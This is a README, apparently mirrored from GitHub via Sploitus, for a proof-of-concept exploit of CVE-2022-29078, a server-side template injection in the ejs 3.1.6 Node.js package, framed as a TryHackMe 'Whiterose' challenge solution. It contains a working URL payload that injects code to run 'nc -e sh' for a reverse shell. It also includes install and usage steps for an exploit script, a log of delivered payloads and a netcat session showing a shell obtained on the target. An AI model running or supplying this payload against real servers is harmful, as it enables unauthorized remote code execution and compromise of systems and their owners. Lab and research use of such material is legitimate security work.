Share
## https://sploitus.com/exploit?id=16D622A6-C7F9-52EC-8534-68952EEC5FBB
<h1 align="center">
THM Challenge: SSTI RCE
</h2>
<p align="center">
<img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2022-29078&label=Visitors&countColor=%2337d67a" />
</a>
<a href="https://www.facebook.com/l0n3m4n">
<img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
</a>
<a href="https://www.twitter.com/l0n3m4n">
<img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
</a>
<a href="https://medium.com/@l0n3m4n">
<img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
</a>
<a href="https://www.python.org/">
<img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
</a>
<a href="https://www.kali.org/">
<img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">
</a>
</p>
<h1 align="center">
<img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
</h1>
## ๐ Description
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
## ๐ Table of Contents
- ๐ [Description](#-description)
- ๐ ๏ธ [Installation](#-installation)
- ๐ [References](#-references)
## POC
```bash
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
```
## ๐ ๏ธ Installation and Usage
```bash
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git
$ python3 -m venv venv && source venv/bin/activate && cd CVE-2022-29078
$ pip install colorama==0.4.6 && pip install requests==2.26.0
```
![burpsuite](burpsuite.png)
```bash
$ python3 CVE-2022-29078.py -h
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD
Send a crafted POST request with custom URL, username, and password.
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target URL (e.g., http://admin.cyprusbank.thm/settings)
-u USER, --user USER Username to send in the request
-p PASSWORD, --password PASSWORD
Password to send in the request
Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd
```
## Output
```bash
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
[!] The exploit will automatically exit once we received a 504 from the server
```
## Log
```bash
$ cat exploit-ssti.log
2024-11-06 11:22:28,919 - INFO - Payload delivered successfully.
2024-11-06 11:32:47,806 - INFO - Payload delivered successfully.
2024-11-06 11:32:58,284 - INFO - Payload delivered successfully.
2024-11-06 11:37:13,616 - INFO - Payload delivered successfully.
2024-11-06 11:55:16,861 - WARNING - Connection failed with status code: 504
2024-11-06 11:59:27,820 - WARNING - Connection failed with status code: 504
```
## Netcat listener
```bash
$ sudo rlwrap -cAr nc -lvnp 443
[sudo] password for l0n3m4n:
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$
```
## ๐ References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001